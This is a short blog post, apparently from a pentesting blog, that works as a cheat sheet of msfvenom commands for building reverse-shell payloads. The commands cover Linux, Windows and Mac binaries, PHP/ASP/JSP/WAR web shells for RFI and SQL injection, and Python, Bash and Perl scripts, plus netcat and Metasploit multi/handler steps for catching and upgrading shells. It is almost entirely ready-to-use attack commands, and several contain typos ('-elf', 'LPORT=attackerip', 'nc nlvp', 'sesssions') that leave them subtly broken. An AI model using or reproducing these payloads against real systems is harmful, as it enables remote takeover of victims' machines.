Disqus Shortname

Sunday, 9 April 2017

Generating Metasploit Payloads : Creating Metasploit Reverse Shell



Generating Metasploit Payloads : Creating Metasploit Reverse Shell


Below is the different type of Metasploit Payloads we can use while to get the reverse shell of victim machine.

These exploit can be used in metasploit by using set payload "payloadnae" and before it we have to set multi handler which can be configured by use exploit/multi/handler

Mention payloads require certain inputs as an option such as LHOST, LPORT.


Operating System Based Bionaries Shell


Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -elf shell.elf
Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -f exe > shell.exe
Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=attackerip LPORT=attackerport -f macho > shell.macho

Web Payloads : Usually For RFI, SQL Injection


PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=attackerip LPORT=attackerport -f raw > shell.php

Open the shell.php file in a text editor and remove the "#" will be present in starting position of this file.

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=attackerip LPORT=attackerip -f raw > shell.jsp
WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=attackerip LPORT=attackerport -f war > shell.war

Script Based Payloads:

Python

msfvenom -p cmd/unix/reverse_python LHOST=attackerip LPORT=attackerport -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=attackerip LPORT=attackerport -f raw > shell.sh
Perl

msfvenom -p cmd/unix/reverse_perl LHOST=attackerip LPORT=attackerport -f raw > shell.pl

Shellcode

Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Simple TCP Reverse Shell

Windows

 
windows/shell_reverse_tcp
windows/x86/shell_reverse_tcp


Linux

linux/shell_reverse_tcp



Mac
osx/x64/shell_reverse_tcp
osx/x86/shell_reverse_tcp

Handling The Reverse/Bind Connection



You can handle those reverse connection using Netcat and Metasploit Multi Handler Module.
Netcat : Use this command on your attacking machine : nc nlvp <attackerport>

Metasploit : In metasploit follow below steps to handle those reverse connection



use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <AttackerIp>
set LPORT <AttackerPort>
exploit (This will prompt you the reverse just after executing the shell)
exploit -j (This will background the shell immedietly after receiving the reverse shell)

Note - Some time, you will not get the meterpreter reverse shell or the shell will be die
immediately due to various reasons. In this case first you can try to simple windows shell 
(shell_reverse_tcp)

use exploit/multi/handler
set PAYLOAD <set payload windows/shell_reverse_tcp>
set LHOST <AttackerIp>
set LPORT <AttackerPort>
exploit -j 
exploit -j (This will background the shell immediately after receiving the reverse 
shell, After getting background you can interact with it by command session -i <sessionnumber>)


Now use this command to upgrade the simple reverse tcp shell into meterpreter reverse shell
sesssions -i <numberofsession> -u 

No comments:

Post a Comment

Featured post

Pentesting Node.js Application : Nodejs Application Security

Pentesting Node.js Application : Nodejs Application Security Hello folks, Today we will see how we can do Pentesting Of NodeJS Appli...

Popular Posts